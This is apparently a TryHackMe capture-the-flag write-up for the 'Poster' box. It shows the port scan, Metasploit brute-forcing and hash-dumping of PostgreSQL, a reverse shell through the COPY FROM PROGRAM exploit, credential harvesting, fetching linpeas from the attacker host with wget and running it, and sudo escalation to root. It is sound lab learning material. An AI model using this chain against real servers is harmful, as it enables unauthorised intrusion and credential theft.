TryHackMe — Poster
THM Tags: #sql #metasploit #rdbms #enumeration
This is a free box, rated at easy on the TryHackMe scale and created by stuxnet. As per the THM rules, passwords/cracked hashes/flags have been obfuscated. As usual, let’s start by enumerating with the standard commands, ping, nmap and gobuster and see where we get to.
ping
Successfully ping a service four times confirming stability of the sever.
┌──(karti㉿kali)-[~]
└─$ ping $IP -c 4
PING 10.10.54.91 (10.10.54.91) 56(84) bytes of data.
64 bytes from 10.10.54.91: icmp_seq=1 ttl=63 time=18.6 ms
64 bytes from 10.10.54.91: icmp_seq=2 ttl=63 time=18.2 ms
64 bytes from 10.10.54.91: icmp_seq=3 ttl=63 time=18.4 ms
64 bytes from 10.10.54.91: icmp_seq=4 ttl=63 time=18.3 ms--- 10.10.54.91 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3004ms
rtt min/avg/max/mdev = 18.228/18.369/18.559/0.119 ms
nmap
This will provide details of open ports that we can investigate.
┌──(karti㉿kali)-[~]
└─$ nmap -sCV -A $IP -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-13 06:21 GMT
Nmap scan report for 10.10.54.91
Host is up (0.020s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 71:ed:48:af:29:9e:30:c1:b6:1d:ff:b0:24:cc:6d:cb (RSA)
| 256 eb:3a:a3:4e:6f:10:00:ab:ef:fc:c5:2b:0e:db:40:57 (ECDSA)
|_ 256 3e:41:42:35:38:05:d3:92:eb:49:39:c6:e3:ee:78:de (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Poster CMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
5432/tcp open postgresql PostgreSQL DB 9.5.8 - 9.5.10 or 9.5.17 - 9.5.21
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2020-07-29T00:54:25
|_Not valid after: 2030-07-27T00:54:25
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.94 seconds
```
gobuster
Provie us with a list of possible directories that we can enumerate, if required.
┌──(karti㉿kali)-[~]
└─$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.54.91
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/03/13 06:23:17 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 276]
/.hta (Status: 403) [Size: 276]
/.htpasswd (Status: 403) [Size: 276]
/assets (Status: 301) [Size: 311] [--> http://10.10.54.91/assets/]
/images (Status: 301) [Size: 311] [--> http://10.10.54.91/images/]
/index.html (Status: 200) [Size: 1233]
/server-status (Status: 403) [Size: 276]
===============================================================
2022/03/13 06:23:26 Finished
===============================================================initial summary
With three ports, 22, 80 and 5432 providing ssh, apache http and a postgresql database, we have a number of areas to investigate.
metasploit
What is metasploit?
The Metasploit framework is a very powerful tool which can be used by cybercriminals as well as ethical hackers to probe systematic vulnerabilities on networks and servers. Because it’s an open-source framework, it can be easily customized and used with most operating systems. link
The target box is providing an rdbms for us to exploit, with a focus on using the metasploit tooling.
Once opened with the command msfconsole we can utilise the search function for postgresql search postgre:
In order to enumerate user credentials we can use the:
- auxiliary/scanner/postgres/postgres_login module. Shown as number 9.
To use the module we simple type in use and the number. Once we have done that we can check additional requirements by running the command options
Each of these modules within metasploit follow the same format. Look in the required field for a yes and then supply those details. In this case we only need to add the RHOSTS, which is our target box. To do this we simply use the command set followed by the name and what the actual answer is, in this case the IP address of the target.
You can run options again to check it is correct, then simply use the command run or exploit, depending on how hacky you are feeling that day.
msf6 auxiliary(scanner/postgres/postgres_login) > run[!] No active DB -- Credential data will not be saved![-] 10.10.54.91:5432 - LOGIN FAILED: postgres:tiger@template1 (Incorrect: Invalid username or password)
[-] 10.10.54.91:5432 - LOGIN FAILED: postgres:postgres@template1 (Incorrect: Invalid username or password)
[+] 10.10.54.91:5432 - Login Successful: postgres:********@template1
[-] 10.10.54.91:5432 - LOGIN FAILED: scott:@template1 (Incorrect: Invalid username or password)[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
This will run through a number of users and passwords, and luckily we have a successful match. Now with a username:password we can execute more exploits with the correct credentials.
- auxiliary/admin/postgres/postgres_sql module. Shown as number 11.
This time checking with options we only need supply the password we have and the RHOSTS again. The default query that we will be running as part of the module is to tell us the version is select version()
By finding out the version of the database it helps to build the bigger picture and adds to the overview of the server.
Next we can look at dumping the user hashes from within the database. For this we can use the:
- auxiliary/scanner/postgres/postgres_hashdump module. Number 15.
Setting our password and RHOSTS will allow us to run the module.
msf6 auxiliary(scanner/postgres/postgres_hashdump) > run[+] Query appears to have run successfully
[+] Postgres Server Hashes
======================Username Hash
-------- ----
darkstart md58842b99375db43e9fdf23875362*****
poster md578fb805c7412ae597b399844a54*****
postgres md532e12f215ba27cb750c9e093ce4*****
sistemas md5f7dbc0d5a06653e74da6b1af929*****
ti md57af9ac4c593e9e4f275576e13f9*****
tryhackme md503aab1165001c8f8ccae31a8824*****[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
This provides us with a list of usernames and hashes. In this case MD5. Further enumeration for these hashes can be completed at https://crackstation.net/
This password can be logged for later if required. Finally we can look to exploit another module that allows command execution as long as we have user credentials.
- exploit/multi/postgres/postgres_copy_from_program_cmd_exec module. Number 6.
Following the processes for each of the previous modules, we add the required fields and run the module. This should create a basic shell.
A quick check to see who and where we are:
[*] Command shell session 1 opened (10.11.56.134:4444 -> 10.10.245.44:53388 ) at 2022-03-13 08:51:09 +0000
id
uid=109(postgres) gid=117(postgres) groups=117(postgres),116(ssl-cert)
pwd
/var/lib/postgresql/9.5/mainHaving checked I find I cannot move from this location but a quick check of /homeshows we have two users, which allows further enumeration.
ls /home/
alison
dark
ls /home/alison
user.txt
cat /home/alison/user.txt
ls /home/dark
credentials.txt
cat /home/dark/credentials.txt
dark:qwerty1234*****We try to get the flag but in this case we appear to not have permission for Alison’s user.txt but can read Dark’s credential file, which appears to be a username:password.
ssh
With Dark’s credentials we can log in through the ssh port.
┌──(karti㉿kali)-[~]
└─$ ssh dark@$IP 127 ⨯
The authenticity of host '10.10.245.44 (10.10.245.44)' can't be established.
ED25519 key fingerprint is SHA256:8bd9QsiWgYCCiNEifxZv+F0jblZZnuBhOKgM6saFGCE.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:1: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.245.44' (ED25519) to the list of known hosts.
dark@10.10.245.44's password:
Last login: Tue Jul 28 20:27:25 2020 from 192.168.85.142
$ sudo -l
[sudo] password for dark:
Sorry, user dark may not run sudo on ubuntu.$ find / -perm -4000 2>/dev/null
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/vmware-user-suid-wrapper
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping6
/bin/umount
/bin/fusermount
/bin/su
/bin/mount
/bin/ping
$ ls -l /home/alison
total 4
-rw------- 1 alison alison 35 Jul 28 2020 user.txt
Trying to see what additional permissions we have with sudo -l does not show promise. Also checking for files with the suid bit set does not provide any further lines of investigation and we still don’t have access to Alison’s text file. Let’s set up an http server and upload linpeas to further enumerate.
linpeas
What is linPEAS?
is a well-known enumeration script that searches for possible paths to escalate privileges on Linux/Unix* targets. link
First we set up a python server on our attacker host:
┌──(karti㉿kali)-[~/binaries]
└─$ python3 -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...Now we get (wget) the linpeas file, change its permission so we can run it and finally execute it:
$ wget http://10.11.56.134:8888/linpeas.sh
--2022-03-13 01:09:50-- http://10.11.56.134:8888/linpeas.sh
Connecting to 10.11.56.134:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 775556 (757K) [text/x-sh]
Saving to: 'linpeas.sh'linpeas.sh 100%[===================================>] 757.38K 4.13MB/s in 0.2s2022-03-13 01:09:50 (4.13 MB/s) - 'linpeas.sh' saved [775556/775556]$ chmod +x linpeas.sh
$ ./linpeas.sh
This provides us with a great deal of information and reading through it we find another password:
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files╔══════════╣ Searching passwords in history files
sudo mv
sudo -s
su alison╔══════════╣ Searching passwords in config PHP files
$dbpass = "p4ssw0rd**********;╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/bin/systemd-ask-password
/bin/systemd-tty-ask-password-agent
/etc/pam.d/common-password
/home/dark/credentials.txt
So let’s try this password with Alison and see what happens:
$ su alison
Password:
alison@ubuntu:/home/dark$ cd
alison@ubuntu:~$ cat user.txt
THM{***************************************}Great, we have found Alison’s password and retrieved the user flag. Now let’s see what she can do with a further sudo -l
alison@ubuntu:~$ sudo -l
[sudo] password for alison:
Matching Defaults entries for alison on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser alison may run the following commands on ubuntu:
(ALL : ALL) ALL
Great Alison can run all commands with root permission. As we know where the root flag is, let’s read it.
alison@ubuntu:~$ sudo cat /root/root.txt
THM{*************************************}
alison@ubuntu:~$ summary
A great box that gave me a further insight into using metasploit with database exploits, which to be honest is something I don’t normally bother with. However, I will now use it as part of my armoury. Right, now where is that next postgresql database server!!